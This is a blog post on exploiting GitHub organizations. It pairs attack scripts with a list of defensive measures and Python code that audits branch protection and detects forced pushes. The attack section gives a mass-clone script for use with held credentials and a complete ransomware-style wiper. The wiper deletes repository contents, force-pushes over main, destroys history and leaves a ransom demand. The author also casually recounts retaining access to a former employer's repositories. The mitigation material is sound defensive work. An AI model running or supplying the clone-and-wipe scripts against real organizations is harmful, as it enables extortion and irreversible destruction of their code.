Skill Issue Dev | Dax the Dev

Hungry Git: A Quick Guide to Hacking Orgs and Bots


GitHub is a popular platform for hosting code repositories and collaborating on software projects. However, recent reports have highlighted security vulnerabilities in GitHub organizations and bots that can be exploited by malicious actors. In this article, we will explore some of the common vulnerabilities in GitHub organizations and bots and discuss how they can be exploited.

One major problem is that organization owners fail to properly secure their repositories. I recently left a job where I had access to a lot of sensitive information. I was able to access the company’s GitHub organization and download all the code repositories without any issues. The organization owner had not set up any security measures, and I was able to access everything with just a few clicks. Worse, when I left the company, I still had access to the organization’s repositories. This is a huge security risk that many organizations are not aware of.

Exploiting GitHub Organization Credentials

Here is a simple bash script that can be used to exploit GitHub organizations once you have credentials that allow access to the organization’s repositories. This script will list all the repositories in the organization and clone them to your local machine. This can be useful for downloading code repositories for analysis or other purposes.

#!/bin/bash
gh repo list <organization-name> --limit 1000 --json nameWithOwner,url --jq '.[]|[.nameWithOwner,.url]|@tsv' | while read -r repo url; do
  gh repo clone "$url"
done

Combined with the following script, this can be used to launch a ransomware-style attack on an organization: clone all the repositories, then destroy each repo’s current state and all of its history. This can be a huge blow to an organization that relies on GitHub for its code repositories.

#!/bin/bash

# WARNING: This script is extremely destructive and irreversible.
# It will destroy all repository data and history.

# Function to overwrite repository
overwrite_repo() {
    local repo_path="$1"
    cd "$repo_path" || return

    # Remove all files except .git
    find . -mindepth 1 -maxdepth 1 ! -name .git -exec rm -rf {} +

    # Create new file with apology message
    echo "This repository and its entire history have been destroyed due to an attack. Pay me money." > README.md

    # Force add, commit, and push
    git add -A
    git commit -m "Repository data destroyed due to security incident" --allow-empty
    git push -f origin main

    # Destroy Git history
    git checkout --orphan latest_branch
    git add -A
    git commit -am "Repository history destroyed"
    git branch -D main
    git branch -m main
    git push -f origin main

    # Remove all refs
    git for-each-ref --format="%(refname)" refs/original/ | xargs -n 1 git update-ref -d
    git reflog expire --expire=now --all
    git gc --prune=now --aggressive

    cd ..
}

# Main script
for repo in */; do
    if [ -d "$repo/.git" ]; then
        echo "Overwriting repository: $repo"
        overwrite_repo "$repo"
    fi
done

echo "All repositories have been overwritten and their histories destroyed."

This script is designed to:

  • Remove all files except .git
  • Create a new README with a ransom message
  • Force push these changes
  • Create a new branch, destroying the old history
  • Force push the new branch
  • Remove all refs and prune the repository

The logic is comprehensive for its destructive purpose. It effectively erases the repository’s content and history.

Please note that this is only an illustration of the logic: it will destroy every Git repository in the directory you run it from. It is a very destructive script and should not be used in any real-world scenario. I have not released, and will not release, a full script that can be used to destroy repositories on GitHub. You have the parts and the understanding you need to devise ways to protect your organization from such attacks.

Mitigating This Attack

Here are some measures that organizations can take to protect their GitHub repositories from such attacks:

Access Control and Authentication

  • Enforce two-factor authentication (2FA) for all organization members
  • Implement SAML single sign-on (SSO) for centralized access control
  • Regularly audit and revoke access for former employees
  • Rotate SSH keys and Personal Access Tokens frequently
  • Limit the number of repository administrators

Branch Protection

  • Enable branch protection rules for all important branches
  • Prevent direct commits to the main branch
  • Require pull request reviews before merging
  • Define minimum number of required approvals
  • Disable force pushes to protected branches
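To check the branch-protection items above across an organization, here is an added Python example (not the post’s own script) that evaluates the JSON GitHub returns from GET /repos/{owner}/{repo}/branches/{branch}/protection; the two payloads are constructed samples, and MIN_APPROVALS is an assumed policy value.

```python
# Constructed samples of GET /repos/{owner}/{repo}/branches/main/protection:
# one hardened repository, one whose settings still permit the attack above.
SAMPLE_PROTECTION = {
    "acme/payments": {
        "enforce_admins": {"enabled": True},
        "allow_force_pushes": {"enabled": False},
        "allow_deletions": {"enabled": False},
        "required_pull_request_reviews": {"required_approving_review_count": 2},
    },
    "acme/legacy-tools": {
        "enforce_admins": {"enabled": False},
        "allow_force_pushes": {"enabled": True},
        "allow_deletions": {"enabled": True},
        # no required_pull_request_reviews: direct commits to main are allowed
    },
}

MIN_APPROVALS = 1  # assumed policy value


def audit_protection(protection: dict) -> list:
    """Return findings for one branch's protection payload.

    A branch with no protection at all makes the endpoint return 404 instead
    of a payload; treat that as every finding below. Missing keys are read as
    the permissive value so a partial payload never hides a gap.
    """
    findings = []
    if protection.get("allow_force_pushes", {}).get("enabled", True):
        findings.append("force pushes allowed: history can be overwritten")
    if protection.get("allow_deletions", {}).get("enabled", True):
        findings.append("branch deletion allowed")
    if not protection.get("enforce_admins", {}).get("enabled", False):
        findings.append("administrators bypass the rules")
    reviews = protection.get("required_pull_request_reviews")
    if reviews is None:
        findings.append("direct commits allowed: no pull request review required")
    elif reviews.get("required_approving_review_count", 0) < MIN_APPROVALS:
        findings.append(f"fewer than {MIN_APPROVALS} approvals required")
    return findings


def audit_org(protections: dict) -> dict:
    """Map each repository to its findings, omitting repositories that pass."""
    return {repo: f for repo, p in protections.items() if (f := audit_protection(p))}
```

Feed it the protection payload of every repository listed by `gh repo list` and the report names exactly the repositories the destructive script could still hit.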

Backup and Recovery

  • Implement automated backups with multiple copies
  • Follow the 3-2-1 backup rule (3 copies, 2 different storage types, 1 offsite)
  • Enable ransomware protection features
  • Maintain unlimited retention of backups
  • Encrypt backups both in-transit and at-rest

Repository Security

  • Enable GitHub Advanced Security features
  • Implement code scanning for vulnerability detection
  • Use secret scanning to prevent credential exposure
  • Configure automated security checks
  • Conduct regular security audits of repositories

Organizational Policies

  • Create and enforce clear security policies
  • Use CODEOWNERS file to define repository responsibility
  • Implement least privilege principle for access control
  • Restrict access to specific IP addresses
  • Monitor and log all repository activities
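For the monitoring item above, here is an added Python example (not from the post) that verifies a push webhook’s X-Hub-Signature-256 header and then flags the forced push or branch deletion that the destructive script produces; the secret, repository names and payload are constructed samples, and PROTECTED_BRANCHES is an assumed policy list.

```python
import hashlib
import hmac
import json

WEBHOOK_SECRET = b"constructed-example-secret"  # assumption: the secret set on the webhook
PROTECTED_BRANCHES = {"main", "master"}          # assumed policy list


def verify_signature(body: bytes, signature_header: str) -> bool:
    """Check GitHub's X-Hub-Signature-256 header: HMAC-SHA256 of the raw body."""
    expected = "sha256=" + hmac.new(WEBHOOK_SECRET, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_header or "")


def classify_push(event: dict):
    """Return an alert for a forced push to, or deletion of, a protected branch, else None."""
    ref = event.get("ref", "")
    if not ref.startswith("refs/heads/"):
        return None  # tag pushes are out of scope here
    branch = ref[len("refs/heads/"):]
    if branch not in PROTECTED_BRANCHES:
        return None
    repo = event.get("repository", {}).get("full_name", "?")
    who = event.get("pusher", {}).get("name", "?")
    if event.get("deleted"):
        return f"{repo}: branch {branch} deleted by {who}"
    if event.get("forced"):
        before, after = event.get("before", "")[:7], event.get("after", "")[:7]
        return f"{repo}: forced push to {branch} by {who} ({before} -> {after})"
    return None


def handle_webhook(body: bytes, signature_header: str):
    """Verify first, then classify; never parse an unauthenticated body."""
    if not verify_signature(body, signature_header):
        return "rejected: bad signature"
    return classify_push(json.loads(body))


# Constructed sample of the push event that `git push -f origin main` raises.
SAMPLE_PUSH = {
    "ref": "refs/heads/main", "forced": True, "deleted": False, "created": False,
    "before": "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678",
    "after": "0f1e2d3c4b5a69788796a5b4c3d2e1f001122334",
    "repository": {"full_name": "acme/payments"}, "pusher": {"name": "someuser"},
}
SAMPLE_BODY = json.dumps(SAMPLE_PUSH).encode()
SAMPLE_SIG = "sha256=" + hmac.new(WEBHOOK_SECRET, SAMPLE_BODY, hashlib.sha256).hexdigest()
```

With branch protection in place the forced push never lands; this check is the backstop that tells you when someone tried, or when protection was silently removed first.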

These measures, when implemented together, create a robust defense against malicious attempts to destroy repository data and history.


Conclusion: Strengthening Your GitHub Security Posture

The scripts and attack vectors demonstrated above highlight critical vulnerabilities that many organizations face with their GitHub repositories. However, the goal of this disclosure is not to enable attacks, but to emphasize the importance of implementing robust security measures.

Critical Security Controls

Organizations must implement multiple layers of protection to secure their GitHub repositories effectively. Make sure to implement things like Access Management, Repository Protection, and Continuous Monitoring to safeguard your code repositories.

By implementing these security measures, organizations can significantly reduce their exposure to potential attacks and protect their valuable intellectual property. Remember, security is not a one-time setup but a continuous process requiring regular review and updates.

The best defense against these types of attacks is proactive security implementation combined with regular security assessments and employee education. Don’t wait until after an incident to strengthen your security posture.